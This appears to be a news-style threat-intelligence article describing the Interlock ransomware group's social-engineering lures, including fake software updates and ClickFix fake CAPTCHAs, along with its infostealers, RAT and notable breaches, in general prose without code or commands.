Since its emergence in late September 2024, the ransomware group known as Interlock has steadily gained notoriety for its cunning and innovative strategies. Despite its relatively modest number of victims, Interlock has made a significant impact with its sophisticated attacks, particularly targeting sectors in North America and Europe. One of their most notable incidents involved the breach of nearly 1.5 million patients’ records at Texas Tech University Health Sciences Center. The continual evolution and refinement of their methods have allowed Interlock to remain a prominent threat in the digital landscape.
Deceptive Tactics and Social Engineering
Interlock initially relied on tricking victims through fake browser updates for popular browsers such as Google Chrome and Microsoft Edge. However, beginning in January, the group expanded its repertoire to include counterfeit security software updates. These updates masqueraded as legitimate products such as FortiClient, Ivanti Secure Access, and Palo Alto Networks Global Protect. This shift in strategy demonstrated the group’s adaptability and their commitment to refining their deceptive methods. Adding to their arsenal, Interlock adopted the ClickFix social-engineering technique. This method involves using fake CAPTCHA prompts to deceive victims into copying and pasting malicious PowerShell commands into their Windows terminal. This technique, which has gained popularity since August 2024, has also been employed by other notorious threat actors, including the North Korean group Lazarus. By utilizing compromised legitimate websites to present these fake CAPTCHAs, Interlock has been successful in leading victims to install a PyInstaller file that deploys a PowerShell backdoor. Interestingly, no additional payloads were observed being installed via this backdoor, suggesting that Interlock was experimenting with this innovative approach without fully exploiting its potential.
Tools of the Trade
In its bid to maintain relevance and avoid the high visibility associated with more prolific ransomware groups, Interlock has developed and deployed a variety of tools such as keyloggers and infostealers. Noteworthy among these tools are BerserkStealer and LummaStealer, with LummaStealer being a prominent malware-as-a-service offering since 2022. These tools allow Interlock to gather sensitive information from victims, furthering their reach and potential impact. The group’s deliberate effort to refine their tools and tactics underscores their commitment to remaining a significant threat in the ransomware landscape.
In addition to keyloggers and infostealers, Interlock employs a custom ransomware for both Windows and Linux systems. This ransomware variant is paired with a unique remote access trojan (RAT) backdoor called Interlock RAT. This backdoor facilitates lateral movement within compromised networks. For this purpose, the group relies on the remote desktop protocol (RDP) and credentials harvested from their infostealers. Furthermore, tools like PuTTY and AnyDesk have been utilized by Interlock for remote access, providing them with the means to effectively navigate and manipulate victim systems.
Evolving Strategies and Implications for Victims
Interlock’s recent revisions to its ransom note mark a strategic shift, highlighting potential legal liabilities for companies if their stolen data is leaked. This tactic underscores the psychological pressure exerted on victims to comply with ransom demands. A notable attack earlier this month targeted the National Defense Corporation, a subsidiary of National Presto Industries. Interlock claimed to have stolen nearly 3 million files from the corporation, thereby raising concerns about the scope and severity of their attacks.
The evolving nature of Interlock’s tactics and strategies reflects a keen understanding of the cyber threat landscape. By continually refining their approaches and leveraging sophisticated social-engineering techniques, Interlock has managed to carve out a niche for themselves, positioning themselves as a resilient and adaptive threat actor. Their ability to adapt and experiment with new methods, such as the ClickFix technique, illustrates a forward-thinking mindset that keeps them one step ahead of traditional defenses.
Conclusion: Addressing the Persistent Threat
Since its appearance in late September 2024, the ransomware group Interlock has been steadily gaining a fearsome reputation due to its clever and innovative tactics. Although it has a relatively small number of victims compared to other groups, Interlock has left a significant mark through its sophisticated cyberattacks, particularly focusing on sectors in North America and Europe. One major incident that brought widespread attention to Interlock involved the breach of almost 1.5 million patient records at Texas Tech University Health Sciences Center. The group has continually adapted and refined its methods, allowing it to stay relevant and dangerous in the ever-changing digital landscape. Interlock’s ability to evolve and implement new strategies makes it a persistent threat to cybersecurity. Their operations have raised alarms, pushing organizations to improve their defenses and stay vigilant against such advanced threats. As long as Interlock continues to innovate, it remains a formidable adversary in the realm of cybersecurity.